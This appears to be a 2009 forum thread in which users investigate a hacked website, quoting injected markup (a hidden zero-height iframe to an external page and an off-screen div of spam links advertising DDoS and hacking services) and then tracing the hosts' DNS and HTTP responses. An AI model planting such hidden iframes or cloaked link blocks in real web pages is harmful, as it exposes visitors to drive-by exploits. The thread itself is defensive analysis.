Can you double check that one please? (hostname is failing to resolve from several locations over here)
Add a www to it or use google the domain name but there is more than just that one and cant see where any exploits popped out. 
After the closing html tag, i see the following:
<iframe src=http://www.3prince.com/kmdr/guest/images/_vti_cnf/tt/rp.htm width=30 height=0><div style="position: absolute; top: -999px;left: -999px;">
��������:
<a href="http://www.kryiyi.com">����һ��˽���l��վ</a>
<a href="http://www.61hj.com">Ӣ�ۺϓ�˽���l��վ</a>
<a href="http://www.reeltop.com">�ڿͽ��W</a>
<a href="http://www.941fc.com">����Ҫ�l??Ӱ�W</a>
<a href="http://www.ddoscc.cn">DDOS������,CC������˽�����������W�ɹ�����</a>
<a href="http://www.10004y.cn">�@���ӵ�˽��</a>
<a href="http://www.gfsj.org.cn">��������˽��</a>
<a href="http://www.3ky.org.cn">DDOS����?����DDOS���Rԭ����DDOS��������������ddos��������IP������</a>
<a href="http://1104f.cn">�@���ӵ�</a>
</div>
The iframed url returns http status code 404. I guess this is, where the exploits came from.
Most of the hosts resolve to 61.160.213.47, except of
w ww.941fc.com (NXDOMAIN)
w ww.ddoscc.cn (CNAME url.xundns.net -> 120.72.34.251)
w ww.10004y.cn (58.252.208.172)
w ww.ddoscc.cn returns:
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2009 13:53:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCATCSDAA=DAOPAKFAOJEIFGHFMGKLFDLD; path=/
Cache-control: private
<meta http-equiv="refresh" content="0;url=http://ddoscc.cn">
ddoscc.cn again resolves to 61.160.213.47.
Trying to access these hosts on 61.160.213.47 always ends with the connection being interrupted/reset by the server.
w ww.10004y.cn does not contain anything malicious from a quick look.
Topic: daily something...... (Read 858041 times)
